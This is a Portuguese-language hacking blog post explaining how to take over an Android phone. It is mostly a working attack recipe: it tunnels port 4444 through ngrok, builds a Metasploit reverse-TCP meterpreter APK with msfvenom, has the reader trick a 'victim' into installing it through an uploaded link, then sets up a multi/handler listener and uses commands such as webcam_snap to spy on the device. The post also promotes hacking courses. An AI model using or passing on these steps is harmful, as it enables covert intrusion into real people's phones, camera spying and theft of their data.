Como hackear celular com Kali Linux (N-grok e Metasploit) - Manha Hacker

Como hackear celular (Android) com N-grok e Metasploit - Manha Hacker


Hoje em dia os Smartphones são muito usados, e com isso, muitos hackers estão de olho em todas as brechas possíveis para invadirem alguns dispositivos. 

Não posso negar que existem diversas maneiras para hackear um celular, porém, você sabe qual é a mais fácil de todas e realmente funcional? 

Hoje vou te ensinar como hackear um celular com N-grok e Metasploit.

O N-grok é um programa de linha de comando que permite criar um caminho de conexão segura a partir do seu localhost e publica-lo na internet. Ele pode ser usado no tanto no Windows, como no Linux e no Mac OS X.

Já o Metasploit é um ferramenta voltada para testes de invasão (pentest). O objetivo dela é analisar vulnerabilidades de segurança e facilitar os testes de penetração.

Lembrando que para você que quer se tornar um PROFISSIONAL na área do hacking, eu separei alguns cursos que irão te ajudar a entender TUDO sobre computação em geral, aliás, um hacker nada mais é que uma pessoa que entende muito de computação, assim, ele sabe como funciona e o que fazer para burlar as regras e realizar invasões...  

Ler muitos posts, livros e assistir vídeos sobre o assunto, ajudam de mais, porém, nem sempre são suficiente. 

As vezes é necessário seguir um método, tendo um expert na área para te guiar do básico ao avançado.

Se você tem interesse em se tornar um hacker ético e/ou aprender a programar, clique aqui para acessar meu post onde explico tudo certinho.

Dando início

Já no seu Kali Linux, clique aqui para acessar o site oficial da N-grok e fazer o download da ferramenta.

Logo após, abra o seu terminal (CMD) e vamos para o processo de ativar o programa:

Primeiro vamos achar onde está o N-grok, para isso use: cd Downloads\ para entrar na pasta de downloads, depois, use o comando ls para listar os downloads existentes na pasta.

Use o comando ls novamente.

Depois de ter feito o download e ter criado a sua conta, você foi redirecionado para uma página, provavelmente, esta: www.dashboard.ngrok.com/get-started. 

Acesse esta página e na opção 3, terá um código para você copiar, copie-o e cole no seu terminal.  



obs: cada conta tem um código diferente.

Depois, use o comando clean para limpar seu terminal.

Use ./ngrok tcp 4444 para abrir a porta 4444

Abra outro terminal (não feche este já aberto).

Use msfvenom -p android/meterpreter/reverse_tcp LHOST=  LPORT= R > /root/Desktop/nomedoseuarquivo.apk

OBS: em LHOST use o endereço que está aparecendo em seu outro terminal, que nem o que está marcado em branco na imagem abaixo:


Já em LPORT use a porta que está aparecendo também na parte Forwading:



Pronto! Nosso vírus está criado e pronto para invadir o celular da vítima.

Tudo que precisamos agora é que ela baixe o aplicativo e execute-o. 

E para isso é preciso fazer upload dele. Entre em qualquer site do ramo, faço o upload do app normalmente e mande o link para a vítima baixar.

Após isso, use os seguinte comando:

service postgresql start 

msfconsole

use multi/handler 

set payload android/meterpreter/reverse_tcp

show options

set lhost 0.0.0.0

set lport 4444

exploit

Agora use "?"  para ver os comandos que são possíveis usar e ter acesso ao que desejar do aparelho, como por exemplo tirar uma foto: webcam_snap

Assim, aparecerá uma lista com todos os comandos, ai é só você ver o que quer fazer, olhar o comando necessário e usa-lo.


Avançado

Ok, essa parte é apenas para quem quer realmente se tornar hacker ético, entender mais sobre computação em geral e/ou aprender a programar.

Se você quer ser APENAS um hacker de Facebook com página falsa, esse tópico não é para você. Lamento. Temos outros posts falando disso.

Você quer aumentar seus conhecimentos para se tornar um profissional, certo? Ou pelo menos ter o conhecimento de um, não é?

Aprender a criar vírus, resolver os problemas sem ter que ficar pesquisando tutorial, e burlar todo tipo de sistema e rede?

Então você está no lugar certo! 

Eu sei como é ruim ficar procurando tutoriais atoa, não achar o que precisa, aprender coisas limitadas que vão servir apenas para uma coisa....

Por isso eu resolvi te revelar o segredo para você ter a liberdade e o conhecimento de burlar sites, redes, sistemas, computadores, celulares e sistemas operacionais (até mesmo Linux).

Um hacker nada mais é que alguém que entende tudo sobre como funciona as redes, os servidores, os computadores, sistemas operacionais, sites etc...

Cada um deles é formado por uma linguagem de programação, logo, para você por invadir eles, primeiro terá que entender como é feito, como funciona.

E para isso, terá que aprender algumas linguagens de programação.

Eu separei pra você algumas linguagens que tenho certeza que você irá precisar. 


Sem essas linguagens inúteis que não servem pra nada e você não vai usar. Apenas as úteis que realmente são essenciais para ser um profissional de segurança da informação.

Caso tenha interesse em saber quais são, como aprender da melhor forma e quais são os benefícios, clique aqui para acessar meu post onde explico tudo mais detalhadamente.




Nenhum comentário: